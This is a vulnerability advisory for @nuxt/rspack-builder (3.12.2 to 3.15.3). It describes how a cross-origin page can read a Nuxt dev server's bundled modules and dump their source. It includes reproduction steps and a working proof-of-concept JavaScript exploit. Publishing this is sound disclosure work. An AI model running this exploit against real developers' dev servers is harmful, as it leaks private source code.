Exposed Dangerous Method or Function Affecting @nuxt/rspack-builder package, versions <3.15.3>=3.12.2 <3.15.3

@nuxt/rspack-builder is a rspack bundler for Nuxt

Affected versions of this package are vulnerable to Exposed Dangerous Method or Function when using webpack or rspack builder and navigating to a malicious website. An attacker can inject a script tag to request a classic script, which is not restricted by the same-origin policy. This allows the script to execute and access the window.webpackChunknuxt_app object. By utilizing Function::toString on the values within this object, the attacker can extract and display the source code.

1. Create a nuxt project with webpack / rspack builder.

2. Run npm run dev

3. Open http://localhost:3000

4. Run the script below in a web site that has a different origin.

5. You can see the source code output in the document and the devtools console.

const script = document.createElement('script')
script.src = 'http://localhost:3000/_nuxt/app.js'
script.addEventListener('load', () => {
  for (const page in window.webpackChunknuxt_app) {
    const moduleList = window.webpackChunknuxt_app[page][1]
    console.log(moduleList)

for (const key in moduleList) {
  const p = document.createElement('p')
  const title = document.createElement('strong')
  title.textContent = key
  const code = document.createElement('code')
  code.textContent = moduleList[key].toString()
  p.append(title, ':', document.createElement('br'), code)
  document.body.appendChild(p)
}

  }
})
document.head.appendChild(script)

• GitHub Commit